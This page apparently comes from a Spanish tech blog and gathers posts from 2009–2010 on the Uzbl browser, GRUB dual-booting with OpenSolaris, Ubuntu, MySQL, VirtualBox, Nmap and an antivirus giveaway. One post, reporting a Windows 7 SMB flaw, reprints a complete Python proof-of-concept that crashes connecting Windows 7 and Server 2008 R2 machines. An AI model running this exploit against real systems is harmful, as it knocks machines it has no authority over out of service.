Rincón Informático

Ya estamos en el 2010 y por parte de todo el staff de Rincon Informatico esperamos que sea un año lleno de bendiciones, retos, metas, mucho conocimiento y adelantos tecnologicos, ojala este 2010 nos acompañen muchos mas lectores de los que nos han acompañado, para seguir compartiendo todo ese conocimiento que poco a poco hemos adquirido. Igualmente muchas gracias a todas aquellas personas que nos leyeron en el transcurso de este 2009 que ya  quedo en la historia.

Esperamos que hayan disfrutado la fiesta  de año nuevo no como este  singular geek, un saludo para todos… y feliz año nuevo!!!

Visto en : soygik

Si estas cansado de el amplio consumo de CPU y memoria de tu navegador preferido (ya sea Firefox, opera, chromium, etc..) te presento  UZBL un navegador web de código abierto  muy minimalista,  que cumple con la filosofia Unix:

Escribir programas que hacen una cosa y la hacen bien. Escribir programas para trabajar juntos. Escribir programas para manejar flujos de texto, ya que es una interface universal

Antes de empezar con el proceso de instalación hay que aclara que si eres de los usuarios que te gusta que tu navegador tenga un sin fin de addons y servicios adicionales, este no es el navegador para ti, por el contrario si eres un usuario el cual solo le interesa que tu navegador sirva para lo que fue diseñado (abrir paginas web), esta aplicacion sera perfecta para ti.

Ventajas de Uzbl

• 100%  Personalizable (editar menús, cambiar colores, atajos)
• rápido
• soporta flash player
• Soporta pestañas
• Al ser tan minimalista no quiere decir que no tenga, marcadores, historiales.
• navegacion con el teclado.

Instalación de UZBL

Ya que este proyecto es demasiado nuevo ( marzo de 2009 ) solo se encuentra en los repositorios de archlinux, gentoo, ubuntu, la versión testing de debian (squeeze)  y por supuesto en la versión inestable (sid),  para los usuarios de estas versiónes, pueden instalar uzbl de esta forma:

apt-get install uzbl

Sin embargo para lo usuarios de otras distribuciones, las cuales no tengan uzbl en sus repositorios, necesitaran hacer lo siguiente:

apt-get install git-core git-arch git-cvs git-daemon-run git-doc git-email git-gui git-svn gitk gitweb libwebkit-dev

Ahora descargamos las fuentes desde la pagina web oficial:

git clone git://github.com/Dieterbe/uzbl.git

Siguiente punto compilar:

make
make install-uzbl-core
make install-uzbl-browser
make install-uzbl-tabbed

Por ultimo debemos copiar el archivo de configuracion tomando como base un ejemplo, para esto hacemos lo siguiente:

cp /usr/local/share/uzbl/examples/config/uzbl/config /home/tu_usuario/.config/uzbl/config
nota: si la carpeta .config o uzbl no se encuentran en tu home, debes crearlas.

Es importante tener en cuenta que este archivo es parte fundamental del navegador, en el se encuentra toda la configuracion  y es alli donde debemos modificar lo que deseamos, desde la apariencia hasta los atajos del teclado.

Usando el navegador web uzbl

Despues de tenerlo instalado solo basta ejecutarlo, dependendiendo de lo que queramos ejecutamos:

uzbl-tabbed -> navegacion con pestañas
uzbl-brower -> navegador simple

algunos atajos de teclado son (recuerda que puedes cambiarlos a tu antojo):

j -> baja la pagina
k -> Sube pagina
h -> corre hacia la izquierda
l ->  corre hacia la derecha
b -> Pagina atras
m -> pagina adelante
o  -> abrir pagina (despues de presionar o digita la url)
r -> actualizar

Aunque llevo poco probandolo  me parece muy bueno, sencillo  y agradable (nada de molestas barras), y me gusto mucho por lo configurable, cada uno puede  adecuarlo a su gusto, por ultimo dejo un screenshot del menu de click derecho que configure.

No soy un guru manejando este navegador, pero seria bueno ir probandolo a fondo y conociendo sus otras caracteristicas que deben ser muchas mas, esto es simplemente un abrebocas a que se animen a probarlo  y nos cuenten sus experiencias.

Para las personas q han instalado opensolaris después de tener instalado un GNU/Linux se han dado cuenta de que el grub de opensolaris no les reconoce por defecto la entrada a el GNU/linux, y pasa lo mismo si tenemos opensolaris y despues instalamos un GNU/linux por que el grub de GNU/Linux  no reconoce ZFS (sistema de archivos de opensolaris), en esta entrada mostraremos  dos posibles soluciones para resolver este inconveniente, muchos de ustedes se preguntaran ¿y q pasa si tengo windows? pues nada por q opensolaris reconoce la entrada de windows por defecto.

si hemos instalado opensolaris después de GNU/Linux  lo que  podemos hacer es lo siguiente copiamos las entradas del menu.lst del pinguino  y las pegamos en  el archivo  menu.lst del opensolaris q se encuentra en /rpool/boot/grub/menu.lst y debe quedar algo como esto:

splashimage /boot/grub/splash.xpm.gz
timeout 30
default 0
#---------ADED BY BOOTADM - DO NOT EDIT ----------------
title OpenSolaris 2009.06 snv_86_rc3 X86
bootfs rpool/ROOT/opensolaris
kernel$ /plataform/i86pc/kernel/$ISADIR/unix -B $ZFS-BOOTFS
module$ /plataform/i86pc/$ISADIR/boot_archive
#--------------------END BOOTADM-----------------------------------
title Windows asi reconoce el opensolaris la entrada de windows.
rootnoverify (hd0,0)
chainloader +1
#Unknown partition of type 5 found on /dev/rdsk/c5d0p0 partition: 2
# It maps to the GRUB device: (hd0,1).
title Ubuntu 8.04, kernel 2.6.24-16-generic
root (hd0,4)
kernel /boot/vmlinuz-2.6.24-16-generic
root=UUID=26393121-0c4a-4081-8363-89e928184a10 ro quiet splash
initrd /boot/initrd.img-2.6.24-16-generic
quiet
title Ubuntu 8.04, kernel 2.6.24-16-generic (recovery mode)
root (hd0,4)
kernel /boot/vmlinuz-2.6.24-16-generic
root=UUID=26393121-0c4a-4081-8363-89e928184a10 ro single
initrd /boot/initrd.img-2.6.24-16-generic
title Ubuntu 8.04, memtest86+
root (hd0,4)
kernel /boot/memtest86+.bin
quiet
##END DEBIAN AUTOMATIC KERNELS LIST

si esta opcion no les funciona por alguna razon, pueden probar  recuperando el grub del GNU/Linux con el super grub disk y despues de esto  vamos al menu.lst del linux que esta ubicando en /boot/grub/menu.lst y copiamos al final de la linea lo siguiente:

title OpenSolaris
rootnoverify (hd0,1)
makeactive
chainloader +1

Siendo el (hdx,y) la parcticion en donde esta ubicado el opensolaris debe quedar algo asi:

title Ubuntu 8.04, kernel 2.6.24-16-generic
 root (hd0,4)
 kernel /boot/vmlinuz-2.6.24-16-generic
 root=UUID=26393121-0c4a-4081-8363-89e928184a10 ro quiet splash
 initrd /boot/initrd.img-2.6.24-16-generic
 quiet

 title Ubuntu 8.04, kernel 2.6.24-16-generic (recovery mode)
 root (hd0,4)
 kernel /boot/vmlinuz-2.6.24-16-generic
 root=UUID=26393121-0c4a-4081-8363-89e928184a10 ro single
 initrd /boot/initrd.img-2.6.24-16-generic

 title Ubuntu 8.04, memtest86+
 root (hd0,4)
 kernel /boot/memtest86+.bin
 quiet

 ##END DEBIAN AUTOMATIC KERNELS LIST

 title OpenSolaris
 rootnoverify (hd0,1)
 makeactive
 chainloader +1

Hoy está disponible para descargar Ubuntu 10.04 Lucid Lynx Alfa 1, versión será de las llamadas LTS o de soporte extendido.

Esta versión ALFA es una versión experimental y por ningún motivo se debe instalar en ningún ambiente que tenga aplicaciones en sistemas productivos.

El Road-Map de Lucid Lynx es el siguiente:

• Ubuntu 10.04 LTS Alfa 1 – 3 de diciembre de 2009.
• Ubuntu 10.04 LTS Alfa 2 – 7 de enero de 2010.
• Ubuntu 10.04 LTS Alfa 3 – 4 de febrero de 2010.
• Ubuntu 10.04 LTS Beta 1 – 4 de marzo de 2010.
• Ubuntu 10.04 LTS Beta 2 – 1 de abril de 2010.
• Ubuntu 10.04 LTS RC – 15 de abril de 2010.
• Ubuntu 10.04 LTS final – 29 de abril de 2010.

Fuente

Descargar

Lo  que se sospecho desde un principio puede hacerse realidad,  desde la compra de Sun por parte de Oracle todos los usuarios de mysql ( me incluyo) temíamos que tarde que temprano este gran proyecto fuera a morir para que Oracle montara su monopolio  e imperio de las  bases de datos.

Por esta razón el creador de Mysql “Monty Widenius” esta pidiendo la ayuda de todos los defensores del software libre, para tratar de  salvar a este gran gestor de bases de datos.  Sin mas que decir dejo el enlace donde Monty explica claramente que podemos hacer para salvar a Mysql. Recuerden la unión hace la fuerza!!

Blog personal de Monty Widenius creador de Mysql

A finales del mes pasado fue liberada la versión 3.1 de VirtualBox, como toda nueva versión solventa varios problemas de ejecución errores de programación varios, pero introduce una característica bastante increíble.

Como bien dice la noticia, “increíble o no” ahora VirtualBox es capaz de ejecutar una migración en caliente de maquinas virtuales, llamado Teleportation, entre equipos remotos sobre una red TCP/IP como la que tenemos en nuestras casas.

Como las capas de Virtualización se ejecutan sobre el Sistema Operativo, VirtualBox ha limitado los problemas de compatibilidad entre diferentes familias de CPU, y tampoco hay problemas entre Sistemas Operativos diferentes.

Para poder ejecutar una migración exitosa se requiere, que las maquinas virtuales sean exactamente iguales, es decir, el hardware Virtual debe estar configurado de la misma manera, también dichas maquinas deben compartir un almacenamiento que puede ser NFS/CIFS, iSCI o canales de fibra óptica.  Hay que tener en cuenta que en el manual de usuario se resalta que una Teleportation entre maquinas de diferentes CPU puede fallar.

VirtualBox 3.1 tiene otras mejores y una (que yo llamaría) EMPEORA:

• Soporte EXPERIMENTAL para virtual EFI, lo que indica que este producto pueda ejecutar una copia de MAC OS X en algún momento.
• Soporte de aceleración en 2D de Sistemas operativos virtualizados WINDOWS usando DIRECTAMENTE la tarjeta grafica del equipo anfitrión.
• El soporte de los adaptadores de red PARAVIRTUALIZADOS.

Ahora la EMPEORA:

• Como era de esperarse ORACLE ha hecho que VirtualBox desde esta versión tenga una nueva licencia, es decir, VirtualBox ya NO ES GPL, ahora es “VirtualBox Personal Use and Evaluation License” por sus siglas en ingles PUEL.
• Ahora existen licencias empresariales y/o subscriciones las cuales comienzan en 30 Dólares al año por usuario y se incluye soporte 24/7

Como cosa adicional podemos nombrar el cliente RDP que están haciendo el cual es una mezcla entre FLASH y AJAX, aun no se sabe cuando se libera pero se ve muy bueno.

Triste cambio de licencia para un software que luchaba por la decencia y que cuenta con un poco más de 16 Millones de usuarios.

Basado en Virtualizacion.INFO

Página para descargar VirtualBox

Actualización:  Erré, con el tema en realidad no hubo “cambio” de licenciamiento como tal, solo una actualización a la licencia de distribución, ruego disculpen la mala información que proporcionó la fuente y por ende Rincón Informático, por ello he cambiado el titulo.

Esta entrada es para todas aquellas personas “gomosas” de las nuevas versiones y que además saben de qué se trata NMAP.

En Rincon Informático hemos hablado un poco sobre esta herramienta de la que cualquier persona interesada en Seguridad informática debiera conocer.

Esta nueva versión (que se encuentra en pruebas) trae consigo (como bien acostumbrados nos tiene la gente de Insecure.ORG) novedades muy interesantes como por ejemplo un Script que chequea si la “victima” soporte SMBv2 para poder explotar cierto problema que tienen algunos Sistemas Operativos.

En total son más de 14 nuevos Scripts (NSE), descubrimiento efectivo sobre puertos UDP y más de 100 cambios entre los que se encuentras los de desempeño y los errores de programación corregidos.

Dejo los respectivos enlaces de descarga, documentación y demás.

Nmap 5.10 Beta 1 Released

Documentación

Descarga

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008

En Rincon Informático nos preocupamos frecuentemente por la seguridad de nuestros visitantes, por ello hemos escrito varios artículos acerca del tema, algunos como reflexiones, otros como consejos y unos pocos sobre herramientas para mantener la confidencialidad de la data, una de las premisas de la seguridad de la información.

En esta oportunidad traemos un año de licenciamiento gratis en uno de las mejores Suite de seguridad que existen en el mercado ESET Smart Security Home Edition (NOD32).

¿Por qué ESET Smart Security Home Edition es bueno? Hay varias razones que hacen que ese sistema sea de los mejores: La rapidez de ejecución, su sistema de heurística para las detecciones de posibles amenazas por comportamientos y obviamente su constante actualización (Todo eso construido sobre el afamado y galardonado NOD 32), ademas: integración de Anti-Virus, Anti-Spyware, Firewall y Anti-Spam.

Bases del concurso.

• Para entrar en este concurso debes tener un WEBlog.
• Debes hacer una entrada enlazando esta, debe llegar un trackback sino llega entonces haces un comentario contándonos sobre tu entrada.
• La rifa termina en un mes, haciendo cuentas el 04 de Diciembre de 2009.
• Gana la persona que por medio de su blog mas REFERIDOS traiga a Rincon Informático, según estadísticas de Google Analytics, para que TODO sea de confiar, como siempre grabaremos un video y lo subiremos para que vean los datos por ustedes mismos.
• Se rifa una licencia de ESET Smart Security Home Edition por un año, para que hagas uso de esta SUITE de Seguridad.
• Señores se vale hacer todo el SPAM que crean necesario.

Yo de ustedes haría la entrada lo antes posible.

Esperamos entonces que gane el mejor y hablaremos del tema el 4 de Diciembre!!!

Larga vida a la seguridad Informática y a Rincon Informático!!!